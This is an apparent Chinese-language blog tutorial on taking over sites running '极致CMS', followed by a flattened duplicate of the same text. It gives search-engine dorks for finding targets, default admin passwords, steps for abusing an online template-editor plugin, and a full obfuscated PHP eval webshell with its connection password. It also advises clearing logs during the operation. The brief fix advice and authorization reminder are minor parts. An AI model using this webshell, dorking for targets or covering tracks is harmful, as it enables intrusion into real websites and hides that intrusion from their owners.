记某CMS漏洞getshell
字数 962 2025-08-06 01:23:31

极致CMS漏洞利用与Getshell教学文档

一、漏洞概述

极致CMS存在多个安全漏洞,包括但不限于:

  • 弱密码问题
  • 后台插件管理功能中的代码编辑漏洞
  • 文件上传限制绕过问题
  • 前台文件上传Getshell漏洞

二、信息收集阶段

  1. 目标发现

    • 使用FOFA等网络空间搜索引擎搜索极致CMS站点
    • 搜索语法示例:title="极致CMS"body="极致CMS"
  2. 后台发现

    • 在目标URL后添加/admin.php访问后台登录页面

三、弱密码利用

  1. 测试常见弱密码组合,如:

    • admin/admin
    • admin/123456
    • admin/password
    • admin/admin123
  2. 成功登录后台后,可进行进一步渗透测试

四、后台功能点测试

  1. 系统设置中的高级设置

    • 可修改上传文件的后缀名限制
    • 但此功能主要影响前台上传
  2. 扩展管理功能

    • 重点测试"在线编辑模板"插件
    • 该插件允许直接编辑PHP代码

五、插件漏洞利用

  1. 插件安装

    • 下载并安装"在线编辑模板"插件
    • 安装时需要设置访问密码
    • 插件目录权限设置为777(高权限)
  2. 代码编辑功能利用

    • 登录插件管理界面
    • 可编辑现有PHP文件内容
    • 插入恶意代码实现Getshell

六、Webshell写入

  1. 免杀小马示例
<?php 
$a = $GLOBALS; 
$str = '_POST'; 
eval /**nice**/ ('' . $a[$str]['cf87efe0c36a12aec113cd7982043573'] . NULL); 
?>
  1. 利用方法
    • 在现有PHP页面中插入上述代码
    • 使用蚁剑等工具连接
    • 密码为cf87efe0c36a12aec113cd7982043573

七、绕过限制

  1. Disable_functions绕过

    • 对于Linux系统,可使用蚁剑插件绕过
    • 常见绕过技术包括LD_PRELOAD、PHP-FPM等
  2. Windows系统限制

    • PHP 5.6环境
    • 可能需要其他绕过技术

八、漏洞修复建议

  1. 修改默认密码,使用强密码策略
  2. 限制插件管理权限
  3. 对代码编辑功能增加严格过滤
  4. 合理设置文件系统权限
  5. 更新到最新版本CMS

九、渗透测试注意事项

  1. 测试前确保获得合法授权
  2. 操作过程中注意日志清理
  3. 测试完成后恢复修改的文件
  4. 遵守网络安全法律法规

十、扩展思考

  1. 可结合其他漏洞如SQL注入、XSS等进行综合利用
  2. 研究CMS其他插件可能存在的类似漏洞
  3. 探索提权可能性(如后续文章所述)

通过以上步骤,安全研究人员可以全面了解极致CMS的漏洞利用方法,并采取相应的防护措施。

极致CMS漏洞利用与Getshell教学文档 一、漏洞概述 极致CMS存在多个安全漏洞,包括但不限于: 弱密码问题 后台插件管理功能中的代码编辑漏洞 文件上传限制绕过问题 前台文件上传Getshell漏洞 二、信息收集阶段 目标发现 : 使用FOFA等网络空间搜索引擎搜索极致CMS站点 搜索语法示例: title="极致CMS" 或 body="极致CMS" 后台发现 : 在目标URL后添加 /admin.php 访问后台登录页面 三、弱密码利用 测试常见弱密码组合,如: admin/admin admin/123456 admin/password admin/admin123 成功登录后台后,可进行进一步渗透测试 四、后台功能点测试 系统设置中的高级设置 : 可修改上传文件的后缀名限制 但此功能主要影响前台上传 扩展管理功能 : 重点测试"在线编辑模板"插件 该插件允许直接编辑PHP代码 五、插件漏洞利用 插件安装 : 下载并安装"在线编辑模板"插件 安装时需要设置访问密码 插件目录权限设置为777(高权限) 代码编辑功能利用 : 登录插件管理界面 可编辑现有PHP文件内容 插入恶意代码实现Getshell 六、Webshell写入 免杀小马示例 : 利用方法 : 在现有PHP页面中插入上述代码 使用蚁剑等工具连接 密码为 cf87efe0c36a12aec113cd7982043573 七、绕过限制 Disable_ functions绕过 : 对于Linux系统,可使用蚁剑插件绕过 常见绕过技术包括LD_ PRELOAD、PHP-FPM等 Windows系统限制 : PHP 5.6环境 可能需要其他绕过技术 八、漏洞修复建议 修改默认密码,使用强密码策略 限制插件管理权限 对代码编辑功能增加严格过滤 合理设置文件系统权限 更新到最新版本CMS 九、渗透测试注意事项 测试前确保获得合法授权 操作过程中注意日志清理 测试完成后恢复修改的文件 遵守网络安全法律法规 十、扩展思考 可结合其他漏洞如SQL注入、XSS等进行综合利用 研究CMS其他插件可能存在的类似漏洞 探索提权可能性(如后续文章所述) 通过以上步骤,安全研究人员可以全面了解极致CMS的漏洞利用方法,并采取相应的防护措施。